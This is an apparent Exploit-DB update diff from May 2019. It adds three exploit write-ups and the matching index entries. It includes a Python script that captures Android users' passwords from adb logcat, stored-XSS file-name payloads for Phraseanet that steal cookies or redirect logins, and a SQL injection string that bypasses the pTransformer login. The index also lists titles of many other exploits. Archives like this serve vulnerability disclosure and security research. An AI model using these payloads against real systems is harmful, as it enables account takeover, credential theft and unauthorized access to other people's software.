DB: 2019-05-29

3 changes to exploits/shellcodes

Microsoft Windows - 'Win32k' Local Privilege Escalation

EquityPandit 1.0 - Password Disclosure

Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass

Phraseanet < 4.0.7 - Cross-Site Scripting

exploits/android/local/46933.txt

@@ -0,0 +1,48 @@
+#Exploit title: EquityPandit v1.0 - Insecure Logging
+#Date:27/05/2019
+#Exploit Author: ManhNho
+#Software name: "EquityPandit"
+#Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
+#Version: 1.0
+# Category: Android apps
+#Description:
+
+   - Sometimes developers keeps sensitive data logged into the developer
+   console. Thus, attacker easy to capture sensitive information like password.
+   - In this application, with adb, attacker can capture password of any
+   users via forgot password function.
+
+#Requirement:
+
+   - Santoku virtual machine
+   - Android virtual machine (installed "EquityPandit" apk file)
+   - Victim user/password: victim@abc.com/123456
+   - Exploit code named capture.py in Santoku vm as below:
+
+import subprocess
+import re
+
+process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
+stdout=subprocess.PIPE)
+dumps = process_handler.stdout.read()
+password_list = re.findall(r'password\s(.*)', dumps)
+print 'Captured %i passwords! \nThey are:' %len(password_list)
+for index, item in enumerate(password_list):
+	print '\t#%i: %s' %(int(index)+1, item)
+
+#Reproduce:
+
+   - Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x)
+
+adb connect x.x.x.x
+
+
+   - Step 2: From Android machine, open EquityPandit, click forgot password
+   function for acccount "victim@abc.com" and then click submit
+   - Step 3: From Santoku, execute capture.py
+   - Actual: Password of "victim@abc.com" will be show in terminal as
+   "123456"
+
+#Demo:
+
+https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv

exploits/multiple/webapps/46935.txt

@@ -0,0 +1,20 @@
+# Exploit title: Stored XSS vulnerability in Phraseanet DAM Open Source software
+# Date: 10/10/2018
+# Exploit Author: Krzysztof Szulski
+# Vendor Homepage: https://www.phraseanet.com
+# Software Link (also VM): https://www.phraseanet.com/en/download/ # Version affected: 4.0.3 (4.0.4-dev) and below
+# Version fixed: 4.0.7
+# Proof of concept.
+
+Phraseanet is an Open Source Digital Asset Management software distributed under GNU GPLV3 license.
+Registered user (or even guest user, depends of configuration) can upload pictures, videos, pdfs or any other document.
+A crafted file name for uploaded document leads to stored XSS. In simplest form the name of the file would be:
+"><svg onload=alert(1)>.jpg
+or:
+"><svg onload=alert(document.cookie)>.jpg
+Please notice that the file name should start from double quotation mark.
+Once a picture will be uploaded it will pop up an alert window and keep popping up every time anybody will login to the website.
+Another example of more malicious usage would be this file name:
+"><svg onload=window.history.back()>.jpg
+From now on every attempt to login will end up with redirection one step back - to login page.
+Please be aware that this will not affect Chrome browser and other browsers built on chrome engine which has XSS filter built in.

exploits/windows/remote/46934.txt

@@ -0,0 +1,24 @@
+# Exploit Title: Petraware pTransformer ADC before 2.1.7.22827 allows SQL
+Injection via the User ID parameter to the login form.
+# Date: 28-05-2019
+# Exploit Author: Faudhzan Rahman
+# Website: https://faudhzanrahman.blogspot.com/
+# Vendor Homepage: http://www.petraware.com
+# Version: 2.0
+# CVE : CVE-2019-12372
+# Tested on: Windows 10 Pro
+
+*Description*
+
+The login form on pTransformer ADC does not filter dangerous character such
+as single quote ('). This has cause the application to be vulnerable to SQL
+Injection.
+
+*Proof-of-concept*
+
+The vulnerable parameter is User ID. By injecting ' or '1'='1'-- ,it will
+bypass the login form.
+
+*Reference*
+
+https://faudhzanrahman.blogspot.com/2019/05/sql-injection-on-login-form.html

files_exploits.csv

@@ -10527,8 +10527,9 @@ id,file,description,date,author,type,platform,port
 46914,exploits/macos/local/46914.rb,"Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)",2019-05-23,Metasploit,local,macos,
 46918,exploits/windows/local/46918.txt,"Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows,
 46919,exploits/windows/local/46919.txt,"Microsoft Internet Explorer 11 - Sandbox Escape",2019-05-22,SandboxEscaper,local,windows,
-46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,ExpLife0011,local,windows,
+46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,Arch-Vile,local,windows,
 46922,exploits/windows/local/46922.py,"Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow",2019-05-24,"Uday Mittal",local,windows,
+46933,exploits/android/local/46933.txt,"EquityPandit 1.0 - Password Disclosure",2019-05-28,ManhNho,local,android,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17467,6 +17468,7 @@ id,file,description,date,author,type,platform,port
 46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
 46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows,
 46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,
+46934,exploits/windows/remote/46934.txt,"Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass",2019-05-28,"Faudhzan Rahman",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41352,3 +41354,4 @@ id,file,description,date,author,type,platform,port
 46910,exploits/php/webapps/46910.txt,"Nagios XI 5.6.1 - SQL injection",2019-05-23,JameelNabbo,webapps,php,
 46921,exploits/php/webapps/46921.sh,"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC",2019-05-24,"Todor Donev",webapps,php,
 46931,exploits/multiple/webapps/46931.txt,"Deltek Maconomy 2.2.5 - Local File Inclusion",2019-05-27,JameelNabbo,webapps,multiple,
+46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,